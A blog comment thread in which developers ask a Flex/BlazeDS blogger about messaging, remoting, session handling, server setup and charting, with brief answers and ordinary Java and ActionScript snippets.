I have gone through the article "Sending messages from Java to BlazeDS destinations using MessageBroker". I have implemented it and it is functioning well. The only exception is that I am making use of LCDS instead of BlazeDS. Anyway, your article was a great help indeed.
Now all I need is to send a message to a few (not arbitrary) consumers. Suppose there are 10 consumers and I need to send a message to 7 of them. How could that be decided from the server side? Could it be made possible by modifying the code of MessageSender.java? I actually need to decide it on the server side prior to pushing the data. Please help.
Hi Jai,
You can go ahead and use HTTPService without BlazeDS. I don’t think it will be vulnerable to pass credentials using HTTPService over HTTPS.
You will need BlazeDS if you cannot communicate with the service provider directly, that is, if the service provider does not have a crossdomain.xml on their server.
AMF will definitely increase performance.
URLs below might be useful. In the BlazeDS dev guide, try to read about channels and RPC services, especially proxy service.
Hope this helps.
hey Sujit,
I have a ‘design’ question for you…
I’m building an inventory application using Flex, AMFPHP, MySQL and the Cairngorm pattern. Take 3 tables as an example: Categories, Colours, Products.
Categories: CategoryID 1, CategoryName Pants
Colours: ColourID 1, ColourName Red
Products: ProductID 1, CategoryID 1, ColourID 1, ProductName Cargo Pants, Price 20.00
Now when I init the app, I send 3 events to gather all records from each table and populate 3 ArrayCollections in the ModelLocator. Great, this works fine.
But I want to populate a Datagrid which contains the fields “CategoryName”, “ColourName”, “ProductName”, “Price”.
I can think of 3 ways to do this:
1) create a new ArrayCollection in my ModelLocator and populate it by calling a PHP service which does a joined SELECT statement. Disadvantages: I need to refresh this AC whenever I change the contents of any of the others, and there is duplication of data being sent/received from the server.
2) create a new ArrayCollection in my ModelLocator and populate it by iterating through the 3 ACs in ActionScript each time any of them changes. Advantage: no excess data sent/received from the server, but potentially higher processor usage.
3) don’t create a new ArrayCollection, but use ItemRenderers for each DataGridColumn which take the appropriate ID field and return the Name field. Again, no excess network traffic but potentially high CPU every time the DataGrid is refreshed.
Or is there another way that I cannot see!
Maybe this is a simple design concept that people learn in Software Design 101 – but having missed that class, I’m playing catchup!
Cheers!
Hi Sujith,
I’m relatively new to Flex. We are developing a multiplayer online game using a Flex client and BlazeDS. I want to know how scalable the BlazeDS server is and what measures I need to take to improve the scalability of the BlazeDS server which I have configured in Tomcat.
Looking forward to hearing from you at the earliest.
Thanks and regards
Kalyan
Hi Kalyan,
Please check out the capacity planning guide at the URL below.
Hope this helps.
Hi Kev,
I would go with the first approach and paginate my data. If the data is huge, then the processing required to loop through the collections for each item is HUGE 🙂
Hope this helps.
Hi Souvik,
Please try creating a custom messaging adapter and filtering your messages there by setting selectors. Please find more details at the URLs below.
Hope this helps.
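A minimal sketch of such an adapter (all names here are hypothetical, and the Consumer side is assumed to subscribe with a selector expression like "targetGroup = 'A'"):

import flex.messaging.messages.AsyncMessage;
import flex.messaging.messages.Message;
import flex.messaging.services.MessageService;
import flex.messaging.services.ServiceAdapter;

public class FilteringAdapter extends ServiceAdapter
{
    public Object invoke(Message message)
    {
        AsyncMessage outgoing = (AsyncMessage) message;
        // only Consumers whose selector matches this header receive the push
        outgoing.setHeader("targetGroup", "A");
        MessageService service = (MessageService) getDestination().getService();
        service.pushMessageToClients(outgoing, true);
        return null;
    }
}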
Hi Diny.
It’s similar to deploying it on any server. You have to
1. Change web.xml
2. copy BlazeDS jar files into WEB-INF/lib folder
3. Place your configuration files (services-config.xml) in WEB-INF/flex folder
Hope this helps 🙂
Hi Sujith,
Thanks for the swift response. But my concern was to improve the scalability of the open source BlazeDS, whereas you were referring to LCDS, which my org cannot afford. Kindly advise keeping in view the open source BlazeDS, which is our priority, and its scalability. Looking forward to hearing from you.
Hi Kalyan,
It all depends on the channel you are using. The capacity planning guide which I pointed you to previously has a comparison of all the channels. BlazeDS supports only Servlet based channels like AMFChannel, HTTPChannel, HTTPStreamingChannel and AMFStreamingChannel, whereas LCDS has these Servlet based channels as well as Java NIO based channels (which scale a lot) and the RTMP channel. The code for both LCDS and BlazeDS is the same for the channels supported in both products.
In the capacity planning guide, you can look at the section comparing Servlet based channels with NIO based channels. Basically, Servlet based channels can handle only a few hundred clients at one go, as there are restrictions on the number of threads a web server will run, and each connection to a client occupies one thread in the case of Servlet based channels.
Hope this helps.
hi Sujit,
I have the following Java and AS classes.
Java class:
public class PatientVO
{
    private AverageDays[] myAvrgDays;

    public AverageDays[] getAvrgDays() {
        return myAvrgDays;
    }

    // Note: this setter name does not match the getAvrgDays/myAvrgDays property,
    // the kind of mismatch that breaks AMF deserialization (see the follow-up
    // below: the problem turned out to be a mistake in the code).
    public void setAvrgDaysPerPiplnVos(AverageDays[] avrgDays) {
        this.myAvrgDays = avrgDays;
    }
}
AS class:
[Bindable]
[RemoteClass(alias="vo.PatientVO")]
public class PatientVO implements IValueObject
{
    public var avrgDays:Array;
}
Here it actually converts the Java object to a Flex AS object with no problems.
But when I am passing the AS object to Java, it somehow nullifies the array (myAvrgDays) in the Java object.
This problem happens only when I am using arrays; it works fine with ArrayList.
hi sujit,
one more query,
I have a line graph with a DateTimeAxis.
By default, if my dateUnits is in years and all the data points to be plotted fall into the same year, the DateTimeAxis won’t show the year.
If the data points spread out over more than one year, then the DateTimeAxis shows all the years.
Is there a way to show the year on the DateTimeAxis if there is only one year and all the data points fall into that year?
hi sujit,
I dug out the solution myself. Set the property alignLabelsUnits=false, so that the graph always puts a label at the beginning of the axis.
Thanks
hi sujit,
the issue with the ActionScript array to Java array was my local problem; it happened because of a mistake in my code.
Thanks
Bibin
hi,
I am trying to integrate LCDS 2.5 with JBoss 4.0.1 SP1. I followed the instructions given. When I tried to deploy the samples.war provided with LCDS, the server throws "ERROR [Engine] StandardContext[/samples]StandardWrapper.Throwable
java.lang.NoSuchMethodError: flex.messaging.config.LoginCommandSettings.setServer(Ljava/lang/String;)V".
Also, "ERROR [Engine] StandardContext[/samples]Servlet /samples threw load() exception
javax.servlet.ServletException: Servlet.init() for servlet MessageBrokerServlet threw exception". I don’t have a clue. Can you please help me out?
cheers,
ravish
Hi Ravish,
Please visit this URL for installation instructions on JBoss server.
Hope this helps.
Hi,
Problem getting the cookie object in a JSP.
I want to get the cookie object in main.html (the wrapper), which I have made a JSP page, when it is loaded, and set the value of the cookie into flashVars so I can read it in the preinitialize handler of the application. But I have a problem getting the cookie object in the JSP.
Description: I have set the cookie on combo change for language using:
HttpServletRequest request = FlexContext.getHttpRequest();
HttpServletResponse response = FlexContext.getHttpResponse();
But I didn’t get this cookie value in the JSP; request = FlexContext.getHttpRequest() is null in the JSP.
Can you help me solve this problem?
Hi Sujit,
I am a Java developer and new to the Flex environment. I have implemented some Flex examples from the Adobe website. I tried to install LCDS on WebLogic 8.1 server but was unsuccessful in doing so. I tried the installation by following the procedure in /8.2/lcds_installation.html. If you can provide a detailed procedure for the installation, it would be helpful.
Thanks,
Srinivas
Thanks for your reply Sujith.
I need your helping hand again.
I am trying to define a StreamingAMFChannel in LCDS ES 2.5.1; it is not getting defined, and it reports that the channel is undefined. The same configuration works just fine with BlazeDS. Just wondering, does LCDS ES 2.5.1 support StreamingAMFChannel?
cheers,
ravish
Hi Srinivas,
Can you please explain what exactly is happening? Is the installation not completing, or could you not start the server?
Hi Ravish,
I think it was added to LCDS 2.6
Hope this helps. 🙂
Hi Ragini,
I think FlexContext.getHttpRequest() is null in a JSP page because the MessageBrokerServlet is the one which sets the HTTPRequest object on the FlexContext.
As the request is not going through the MessageBrokerServlet, I don’t think you will have the HTTPRequest object there. Please try the normal J2EE way to get access to the cookie in your JSP page.
Hope this helps.
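For example, a minimal sketch of reading a cookie the standard J2EE way (the helper name is hypothetical):

import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;

public class CookieHelper
{
    // returns the value of the named cookie, or null if it is not present
    public static String getCookieValue(HttpServletRequest request, String name)
    {
        Cookie[] cookies = request.getCookies();
        if (cookies != null)
        {
            for (Cookie cookie : cookies)
            {
                if (name.equals(cookie.getName()))
                {
                    return cookie.getValue();
                }
            }
        }
        return null;
    }
}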
Hi Sujith…
Could you let me know about configuring BlazeDS with BEA WebLogic Workshop? I would like to know the changes to be made in the configuration XML file, with a small example.
Tanmoy
hi sujit,
I am working on a project using WebORB for .NET and Flex 3.
I am retrieving an array of strings from ASP.NET using WebORB. The array has the right length, but all the values are blank. In WebORB I have used the test-run feature to invoke this same call, and the array is returned with all the values. I have done the same from an ASPX page. Maybe it’s the way I am reading the array into ActionScript? Please help me (and other WebORB for .NET + Flex users) with a tutorial on the interaction between these two (and a solution for my problem too 🙂 ). Thank you in advance. daniel
PS: if it makes a difference, the class is written in C#, and the class retrieves a static array and returns an array (returned_array = static_array).
Please let me ask you a question. In our application, we are using a custom messaging adapter which uses an RTMP channel. Our intention is to get an acknowledgement on the server. In our case, let us assume a Java class is the message producer (like MessageSender.java in your article “Sending messages from Java to BlazeDS destinations using MessageBroker”). If we had sent the message using the Flex Producer component, we could optionally specify “acknowledge” and “fault” event handlers for the Producer component. How exactly could this be implemented when a Java class is sending the message and this class is acting as the message producer?
Hi Sujit,
I am working on BlazeDS applications where I want to detect the browser close event on the server side.
I have tried using adapters and session listeners, but nothing is working for me.
I saw your blog and thought that you are the right person to solve the problem.
So please let me know if there is any solution for the same.
Regards,
Pravin Uttarwar,
Hi Sujith,
We are trying to integrate Flex with a single sign-on product (Siteminder). In our environment, the incoming request to the Flex application gets routed via Siteminder. Siteminder authenticates the incoming request, then appends a few authorization details (user profile, like role, department, etc.) to the HTTP header and redirects the request to the Flex application.
Our requirement is to read the HTTP header information and perform some business validation based on the user profile. But we couldn’t find any direct functions which help us read the HTTP header information. When we browsed through the Flex documentation, we found a couple of functions for it (like URLLoader). But these functions require sending an explicit request to the server and reading the response header. In our case, we are not sending any explicit request to Siteminder; rather, we are just trying to read the HTTP header when the user request hits the SWF file.
We have managed to find a solution using a JSP wrapper and flashVars. But we don’t want to use a JSP wrapper in between. Is there any other way to read the HTTP header? Any suggestion would be greatly appreciated.
Thanks,
Kumar
Hi Sujith,
Need barcode handling like generating label, reading barcode etc.,
thanks and regards
raaja
Hi Raja,
I didn’t understand 😦
Hi Pravin,
A Flex application running in Flash Player in the browser will not dispatch any event when the browser is closing. You will have to use ExternalInterface for this. Please find more details on how to achieve this at the URL below.
Hope this helps.
Hi Souvik,
Do you want an acknowledgment on the server? That is, you want to make sure the message is being delivered. Did I understand it correctly?
Hi Daniel,
Please visit the URL below for details on Remoting with WEBORB.
Hope this helps.
Hi Kumar,
I don’t think you can do this without a JSP wrapper 🙂 You basically need a JSP/container/server which will accept a POST/GET from the SSO server. If you are worried about passing these values as flashVars, you can consider adding the values to a persistent storage on the server and generating an ID for them. Now pass this ID to your Flex application and securely fetch the values from the Flex application using the ID from the persistent storage. 🙂
Hope this helps.
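A minimal sketch of that pattern (class and method names are hypothetical):

import java.util.Map;
import java.util.UUID;
import java.util.concurrent.ConcurrentHashMap;

public class SsoValueStore
{
    private static final Map<String, String> store = new ConcurrentHashMap<String, String>();

    // the wrapper stores the SSO header values and passes only the id as a FlashVar
    public static String put(String userProfile)
    {
        String id = UUID.randomUUID().toString();
        store.put(id, userProfile);
        return id;
    }

    // the Flex application fetches the values later through a remoting call
    public String get(String id)
    {
        return store.remove(id); // one-time read
    }
}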
hi…
I am new to Flex. I need to add some Java JARs and core Java files in my Flex desktop application, but I do not know how to do this and use those *.java files in my Flex project. Please help me to do that; your help is important.
thanks and regards
arun
Hi,
I am a ColdFusion developer and a Flex aspirant. I want to know how we can integrate Flex with BlazeDS and ColdFusion. I don’t know much about BlazeDS. Can we make a chat application in ColdFusion with BlazeDS support and integrate it in a Flex site? I have tried your example with BlazeDS and Java and it was quite helpful, but the problem is how we can use BlazeDS along with ColdFusion. Is there anything we need to change in the CF admin for BlazeDS to work along with CF? Is that possible? Any tutorial links would be helpful. Thanks.
Hi Sujith,
Nice articles. In your post “Session data management in Flex Remoting” you talk about calling the static method FlexContext.getFlexSession() for Flex Remoting. But I’m using servlets. Normally you set objects in the HTTP session, but Flex also has its own session, and for some reason 2 sessions are getting created. So I want to access the Flex session instead of creating an HTTP session in the servlet. I tried FlexContext.getFlexSession() but it doesn’t work; it returns null. Can you tell me how to achieve this?
Thanks,
Romil Sinha
Hi Sujit,
I got your reference from Sambhav Gore in Bangalore.
I have a few queries related to session management in BlazeDS.
1. Once a session has been established, how do we ensure that the next request coming in is from a valid user?
2. How does cache management work in Flex? Is it possible to maintain data at the client side for a specified amount of time?
Thanks,
Rabiya
Hi Rabiya,
1. What exactly do you mean by a valid user? If you meant the same user, then you can just check for some object stored in the session. Requests from the same user will return one session object.
2. Flex is a stateful client; any instance of the objects created will remain as long as the user doesn’t reload the entire SWF, that is, by refreshing the loaded page. If you want to store an object only for a specified amount of time, you can use a Timer and then remove the instance at the end of the period.
Hope this helps.
Hi Romil,
In a Servlet you can get the FlexSession object. It is stored in the HttpSession as an attribute. Please get the attribute named “__flexSession” from the HttpSession. FlexContext.getFlexSession() works only when the request is received by the MessageBrokerServlet.
Hope that helps.
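A minimal sketch (the cast to flex.messaging.FlexSession is an assumption about the stored type):

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import flex.messaging.FlexSession;

public class FlexSessionHelper
{
    public static FlexSession getFlexSession(HttpServletRequest request)
    {
        HttpSession httpSession = request.getSession(false);
        if (httpSession == null)
        {
            return null;
        }
        // "__flexSession" is the attribute name mentioned above
        return (FlexSession) httpSession.getAttribute("__flexSession");
    }
}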
Hi Ajith,
You can integrate ColdFusion and BlazeDS. Please visit the URL below for more details.
Hope this helps.
Hi Arun.
As of today you cannot do this with just AIR. You can try having a look at Merapi project, this will act as bridge between AIR and Java. Please find more details at the URL below.
Hope this helps.
Hi Sujit,
Is it possible to deploy a Flex application using remoting and LCDS to a different server? I.e., remove the Flex app from the Java web app and deploy it on another server, like a web server?
The reason I ask is that when running the sample apps on a fresh LCDS 2.6 install using Flex Builder, there is no option to change the output directory. And when we run the samples, the destination cannot be found. So I assume that the Flex app must be contained within the LCDS web app?
Is there any way around this? And is this the same situation with AIR apps (that they must be deployed to the lcds web app?
Hi Sujit,
I have a real urgent question:
I want a LineChart to be drawn.
I have these timestamps [84, 1000, 34000, 34699, 439999] representing the x-values of data points along the x-axis.
Unfortunately, the distance between two adjacent data points along the x-axis is always the same; that means that between the points with x-values 84 and 1000 there is the same distance along the axis as between the points with x-values 34699 and 439999.
But the distance between the points with x-values 34699 and 439999 should be much greater than between 84 and 1000.
How can I customize the distance between data points on a LineChart to solve my problem?
I really dont know right now and I did not find a solution yet.
Would be very nice to get some hints.
Greeting,
Frank
Hi Matt,
You should be changing the end-point URLs of the channels you are using. Please find more details in the article below.
Please check out the comments also.
Hope this helps.
Sujit. Hope you can provide some help?
I have a simple read/write project in Flex 3 using BlazeDS to access a Java class.
The program runs fine within the Flex Builder environment. However, it does not run from the bin-release compiled version. It doesn’t seem to be talking to the Tomcat server.
I am trying to write to a file name which is absolute, i.e., c:\\….
I have also tried using a UNC path to the file and it doesn’t work at all.
Got any suggestions?
A followup on post 121.
When the write option is selected, a long error message appears that completely scrolls off the page. Some of the path names try to point to a directory called messagebroker which does not exist. I don’t know what it is trying to reach.
Thanks in advance
Is there a way to override the Responder.as class?
My requirement is that in one place I should be able to catch all the faults occurring with Remote/HTTP object invocations.
How to block copy/paste for “TextInput” in Flex.
Hi Bob,
I didn’t get what your application is trying to do. Are you trying to write into a file on the client system, or is the file on the server?
Hi Amarnath,
Did you try just extending that class? Didn’t that work?
Hi Amarnath,
Please try the keydown event.
Hope this helps.
Reply to post 125:
In development mode, I have a Tomcat server on my local computer which is inside BlazeDS. Inside the webapps folder is a Java class as well as the services-config files that have destinations for Flex. The client interface has been built with Adobe Flex 3 Builder. The Java class has two functions: one that writes a line to a file and another that reads a file. The file name is specified in the Flex client.
hi sujeet,
We have an existing Struts based application. I want to change the view (JSP to Flex). I followed some examples and got stopped by one problem: the response from Struts comes to a JSP (where I build XML) and from the JSP to Flex. How can I avoid this intermediate JSP? Please help me with this.
Can you provide me a detailed example of using FxStruts? I followed some examples on the net; none were very helpful to me.
sameer
Hi Sujith,
How do I work with SSL-enabled web services?
If you have any samples or tutorials, can you please point us to them?
Hi Sameer,
FxStruts solves this problem. Please find a detailed example at this URL
Hope this helps.
Hi Sujith,
thanks for the link; I had seen the Developer guide, but the “Flex client API” section will be very useful. The problem was not to do with WebORB (.NET) or with Flex receiving or working with the array; the array I was passing had blank entries in it when I later tested the array in a different way.
thanks in any case and regards
Hi Sujith,
Can I embed a SWF into another SWF file and have them both communicate, e.g., pass params etc.? Is there a way to do this?
Regards
-Chandu
Hi Chandu,
Please try SWFLoader, ModuleLoader or LocalConnection.
Hope this helps.
Hi Daniel,
The problem might be because the properties in the object being passed are not public. Can you please check if the properties are public? If you debug your Flex application from Flex Builder, you can see a message in the console if there is a problem setting properties of the object on the Flex side.
Hope this helps.
Hi, my name is M.V. Narayana. I am working in Java and Flex technology, with 2+ years of total experience. Anyone, please send me a resume at mvn.flex@gmail.com.
Thanks
Dear Sujit,
I am looking at adding BlazeDS to an existing Tomcat/JSP application for which we have a functioning web-services Flex/AIR app. The app handles lots of images and I felt that AMF would be a good way to improve communications performance.
However, I am a bit confused. How can I take all my existing JSP based APIs and port them to BlazeDS so I can use AMF? Today we use Cairngorm as the MVC and HTTP services to do the requisite get and post actions.
I just need a little pointer in the right direction.
Sincerely Greg
hi Sujit,
Topic: Querying a MYSQL database and generating pdf reports
dear Sujit,
I have a problem sending a list from Java that should fill a data grid.
My data source is a list of HashMaps; each HashMap contains key/value pairs that should represent the column names and their values.
In all the examples, the data was taken from a database of some sort and put into designated beans with properties.
Is it possible to create a simple list of HashMaps and send it remotely to be the dataProvider?
Thanks a lot
Jo
hi sujit,
Can you please tell me how I can store data from my Flex application directly on the hard disk of my computer? E.g., if I am writing a text file in my application, how can this be stored as a text file on the hard disk?
Hi,
I need to generate some objects at serverside based on some conditions and these objects will be pushed to flex client (not pull) using blazeDS messaging services. Can you provide me any sample code snippet for this.
Thanks,
Prabhakar.
Hi,
This is Sri Tej, Adobe Student Representative for RIA. I met you on Feb 28th at Hyderabad. As you have seen the multiplayer gaming environment, my next plan is to develop a multiplayer game which is also a 3-D version using Flex. Can you please help me out in developing a 3-D environment, something like a room or a person standing or such? Do we have any tools to develop such a 3-D environment using Flex?
Thanks,
Sri Tej.
Hi Joe,
Yes, you can. You will get the HashMap instances as instances of Object.
Hope this helps.
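For example, a minimal sketch of a remoting method returning such a list (all names are hypothetical):

import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class ProductService
{
    // each HashMap arrives on the Flex side as a generic Object,
    // so its keys can be used as dataField names in a DataGrid
    public List<Map<String, Object>> getRows()
    {
        List<Map<String, Object>> rows = new ArrayList<Map<String, Object>>();
        Map<String, Object> row = new HashMap<String, Object>();
        row.put("productName", "Cargo Pants");
        row.put("price", 20.00);
        rows.add(row);
        return rows;
    }
}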
Hi Masood,
Please check out article at the URL below.
Hope this helps.
Hi Prabhakar,
Please find details at the URL below.
Hope this helps.
Hi Sri Tej,
Please visit URLs below for useful resources for 3D in Flash.
Hope this helps.
Hi Sujit,
I’m new to Flex. I have been trying to use ExternalInterface.addCallback in IE 7 to invoke ActionScript functions from JavaScript. It does not work. IE does not show any error; it just skips the statement and executes the remaining statements. Can you please explain with an example?
Thanks,
SK
hi sujit,
Can you send me a sample example that explains the complete flow of execution, including: the user enters details, the request goes to the controller and executes an action, then the values are posted to the database, and the response comes back to Flex?
An add-details and retrieve-details example, please.
Dear Sujith,
I am new to Adobe AIR and I made an application to be a container for PDF forms. The problem is I want to pass variables from Adobe AIR to the PDF (integrate AIR and PDF together), and at the same time I want that when I save the data in the PDF file itself, the PDF file disappears and returns me to the Adobe AIR application.
Please, I need help with this urgently.
Hi Sujit,
I have a bar chart application.
One series shows customer importance and the other shows customer satisfaction.
My requirement is to draw a rectangle at the end of the customer satisfaction bar series if the customer satisfaction is less than the customer importance, and show the difference in a label inside the rectangle.
If the customer satisfaction is greater than the customer importance, then draw the rectangle within the bar series and show the positive value in the rectangle.
In order to do this I have created a custom bar series named “SatisfactionGapBarSeries” extended from BarSeries, and a custom box item renderer named “SatisfactionGapBoxItemRender”.
In the updateDisplayList of the SatisfactionGapBoxItemRender I have drawn the rectangle according to my need, but I am not able to add the label.
How can I add a label into the drawn rectangle?
Will you please help me?
Regards
aK
Software Engineer
Satmetrix
TechnoPark
Trivandrum
hai sujit,
I am working on Flex. I wanted to implement the ActiveMQ concept for one of my applications, so can you please send me a sample application which uses the ActiveMQ message broker?
Thanks in advance.
I have a strange problem with Blaze DS. I am using Flex SDK 3.3 and BlazeDS 3.2 ( also tried 3.3)
I have an AS class mapped to a Java bean on the server side. I am able to retrieve a collection of such beans from the server, and they are mapped properly. I am calling a method on my remote object which takes this bean as its only argument, but I am getting the following error:
[FaultEvent fault=[RPC Fault faultString=”Cannot invoke method ‘addEquipment’.” faultCode=”Server.ResourceUnavailable” faultDetail=”The expected argument types are (com.gtech.esrs.rm.core.beans.MiscEquipment) but the supplied types were (flex.messaging.io.amf.ASObject) and converted to (null).”] messageId=”9E8C3D0A-D00A-B927-E2B4-A37CA5BDCF52″ type=”fault” bubbles=false cancelable=true eventPhase=2]
The similar error is displayed in the server log, indicating somewhere the [RemoteClass] meta data is being lost during serialization.
Could you please help.
Thanks
Hi SK,
Please make sure you have everything properly set up as explained at the URL below. If your problem persists with everything in place, code to reproduce the issue will help in understanding the problem.
Hope this helps.
Hi aK,
Instead of drawing a rectangle, try adding a container/component.
Hope this helps.
Hi Namita,
Please find samples at the URL below.
Hope that helps.
Hi Manish,
Resource unavailable is thrown when the class is not found. Can you please confirm that the objects of the mapped class type are properly converted to the appropriate AS class type? If the objects are properly converted and the problem occurs when sending back, please share code to reproduce the issue. Please send to sujitreddy.g@gmail.com
Hope this helps.
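For reference, a minimal sketch of a bean that converts cleanly (the package and property here are hypothetical); the Flex side would carry a matching [RemoteClass(alias="com.example.MiscEquipment")], and the bean needs a public no-argument constructor plus matching getters/setters:

package com.example;

public class MiscEquipment
{
    private String name;

    // a public no-arg constructor is required for AMF deserialization
    public MiscEquipment() {}

    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
}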
hi Sujit,
I’m trying to find a solution for debugging PHP service classes when used as the back end for Flex apps. I’d prefer not to fork out extra money for Zend Studio at the moment, and from what I read about PDTv2, it seems like all I need.
While I can set breakpoints on individual PHP files and step through the code, I can’t seem to trigger a breakpoint in a PHP service class when it is invoked from a Flex app.
Can you offer any help or advice?
cheers
Woohoo! Scratch that, I got it working.
I followed these instructions to install XDebug:
I had to compile the xdebug.so plugin from the v2.04 source for it to install properly under MAMP; luckily someone posted this info in the comments below the post.
Installed PDTv2 via Eclipse software updates:
But then I could not get Firefox to connect to Eclipse – the issue seems to have been some faulty prefs in Eclipse. I just created a new workspace, created a new PHP project pointing to my Zend services directory and imported my Flex project.
It’s probably sad how excited I am to have this working. No more looking at PHP error logs (well less anyway).
cheers
Hi Sujit,
I have been a Flash developer for a long time now, and I have been trying Flex since 1.5 whenever I get time. I had developed a sample application in Flex 2 with ColdFusion as the middle layer and an MS Access DB; it worked out well but kept getting more complex as the size increased, and I got stuck.
I have gone through and somewhat understood the BlazeDS structure and worked through the examples too. Since I cannot install Flex Builder, I am again stuck compiling Flex 3 files with the command line compiler, to be deployed on the preconfigured Tomcat that comes with the free BlazeDS turnkey download.
The same thing happened with the Cairngorm architecture: I have gone through the documentation and somewhat understood it, but could not implement it due to the lack of any sample application that includes both the Cairngorm framework and the actual application source code, which would make it easy for me to understand the structure in detail and help me develop an application on the Cairngorm framework without any fear.
I am seeking your help on the following points:
1. Any small sample Cairngorm-based application, along with the Cairngorm framework used in it and the application source code, to understand the Cairngorm framework in actual use.
2. The steps to compile a Flex application on the command line for BlazeDS, so that it takes its configuration from services-config.xml or the other service-related XML files rather than the default flex-config.xml. [In short: how to compile the Flex application on the command line using Flex SDK 3, not Flex Builder, to make it work with BlazeDS.]
It would be great if you could help with these points.
Thanks & Regards,
Iresh SA
this is my mxml code
this is my java code
package com.codeofdoom;

import java.util.ArrayList;
import java.util.List;
import java.util.Random;

import flex.messaging.MessageBroker;
import flex.messaging.messages.AsyncMessage;
import flex.messaging.messages.Message;
import flex.messaging.services.MessageService;
import flex.messaging.services.ServiceAdapter;
import flex.messaging.util.UUIDUtils;

public class BlazeDsServiceAdapter extends ServiceAdapter
{
    Random random;
    PersonGenerator thread;

    public BlazeDsServiceAdapter()
    {
        random = new Random();
        System.out.println("Adapter initialized");
    }

    public void start()
    {
        if (thread == null)
        {
            System.out.println("Adapter started");
            thread = new PersonGenerator();
            thread.start();
        }
    }

    public void stop()
    {
        System.out.println("Adapter stopped");
        thread.running = false;
        thread = null;
    }

    private List generatePersons()
    {
        List arr = new ArrayList();
        for (int x = 0; x < 5; x++)
        {
            Person p = new Person();
            p.setFirstName("FirstPerson" + x);
            p.setLastName("LastPerson" + x);
            p.setAge(random.nextInt(80));
            arr.add(p);
        }
        return arr;
    }

    public class PersonGenerator extends Thread
    {
        public boolean running = true;

        public void run()
        {
            String clientId = UUIDUtils.createUUID();
            MessageBroker msgBroker = MessageBroker.getMessageBroker(null);
            while (running)
            {
                // pushes a fresh list of Person objects to the destination every 5 seconds
                AsyncMessage msg = new AsyncMessage();
                msg.setDestination("BlazeDsServicePush");
                msg.setClientId(clientId);
                List a = generatePersons();
                msg.setMessageId(UUIDUtils.createUUID());
                msg.setBody(a);
                msgBroker.routeMessageToService(msg, null);
                try
                {
                    Thread.sleep(5000);
                }
                catch (InterruptedException e)
                {
                    System.out.println("Exception");
                    e.printStackTrace();
                }
            }
        }
    }

    @Override
    public Object invoke(Message message)
    {
        System.out.println("message--------" + message);
        // message.getBody() is whatever the Flex client published on the destination
        if (message.getBody().equals("New"))
        {
            System.out.println("Adapter received new");
            return generatePersons();
        }
        else
        {
            System.out.println("Adapter sending message");
            AsyncMessage newMessage = (AsyncMessage) message;
            MessageService msgService = (MessageService) getDestination().getService();
            msgService.pushMessageToClients(newMessage, true);
        }
        return null;
    }
}
I want to compare the msg in the invoke method, but it is not receiving what I published in Flex; it is receiving some other data, like this:
message——–Flex Message (flex.messaging.messages.AsyncMessage)
clientId = 2648E184-810D-494A-08CF-B8B0BAB10C99
correlationId = null
destination = BlazeDsServicePush
messageId = 266A6A61-1D0C-4E49-01DC-C352B839495E
timestamp = 0
timeToLive = 0
body = [com.codeofdoom.Person@1a1ff9, com.codeofdoom.Person@12943ac, com.codeofdoom.Person@19ed7e, com.codeofdoom.Person@3727c5, com.codeofdoom.Person@1140709]
Adapter sending message
message——–Flex Message (flex.messaging.messages.AsyncMessage)
clientId = 2648E184-810D-494A-08CF-B8B0BAB10C99
correlationId = null
destination = BlazeDsServicePush
messageId = 266A9A10-2509-4F0F-6609-00A73D3053A5
timestamp = 0
timeToLive = 0
body = [com.codeofdoom.Person@1f95165, com.codeofdoom.Person@14ed577
Can you suggest some way to overcome this?
Sujith,
I have JBoss as my application server and am using Flex for my front end. Essentially I am to convert one legacy application into a Flex one, and I am running into this problem a lot. In the Java code of the application, a lot of application-specific parameters are stored in the Request object and Session object. Is there a way by which I can access the HttpSession and HttpRequest objects in Flex?
In Java, if I do session.setAttribute("userName", xxx);
request.setAttribute("userName", xxx);
how will I do session.getAttribute in my MXML?
Hi Sujit,
First of all, I have found your blog extremely helpful as I’m just starting off with Flex. As a part of my project, I am required to upload an image from the client to the server, and I’m using a servlet to handle this request. You might have guessed I’m using Java at the business tier. I found a tutorial using the FileReference object and it seemed very clear. The JSP code present in the comment section of that blog doesn’t seem to work when I try to use similar code in the doGet() method of my servlet.
// requires commons-fileupload (and commons-io) on the classpath
protected void doGet(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    try {
        DiskFileItemFactory factory = new DiskFileItemFactory();
        ServletFileUpload upload = new ServletFileUpload(factory);
        List<FileItem> list = upload.parseRequest(request);
        for (FileItem item : list) {
            File uploadedFile = new File("H:/" + item.getName());
            item.write(uploadedFile);
        }
    } catch (Exception e) {
        e.printStackTrace();
        return;
    }
}
This is just a test program, but it doesn’t seem to be working. When I submit the file for uploading on the Flex front end, it continuously says ‘waiting for localhost’ (I have verified the URL of the servlet and the one mentioned in the URLRequest). When I directly try running my servlet on the server, I get a ClassNotFoundException for FileItemFactory even though I have imported it.
Do you know why this is happening, or if I can do this in an easier way without using BlazeDS?
Your suggestions would be valuable.
regards,
Nikhil
Hi Sujith,
I would like to send XML data from a remoting service to my Flex client. How can I achieve that? Can I send an XML string, and how do I create XML from that string on the client side?
Any help will be appreciated.
Regards
-Chandu
Hi Iresh,
To configure your services-config.xml for your Flex project, you just have to add -services “\services-config.xml” to your compiler arguments.
Please find developer documentation for Cairngorm at this URL
You will find sample at this URL
Hope this helps.
Hi Raj,
Instead of setting the objects in the session or the request, you can send those objects to Flex application from your Java classes. Please find details on how to invoke Java methods from Flex application at the URL below.
Hope this helps.
Thanks Sujith. Well, I did analyze this option, but since I am a newbie I always thought there must be a straightforward way to store session data.
The problem is I have a JSP page which calls a controller login method; on failure it redirects to one page and on success it redirects to a different page. It is not exactly Struts, but it works on a concept similar to Struts: I use Java Page Flow.
I had rewritten the first login.jsp as login.mxml.
login.mxml, parts of the code where I have issues:
{userName.text}
{password.text}
private function validateForm(evt:MouseEvent):void {
    if (validated)
        // call registrationRequest.send();
}
I have two functions, handleResult and handleFault. This is where my main question is.
This is my controller method, Login.do:
@Jpf.Action(forwards = { @Jpf.Forward(name = "success", path = "MainV2.jsp"), @Jpf.Forward(name = "retry", path = "welcome.jsp") })
public Forward login(Controller.loginForm form) {
    Forward forward;
    // call db validator
    if (validated)
        return forward("success");
    else {
        session.setAttribute("errorMessage", "error message from db");
        return forward("failure");
    }
}
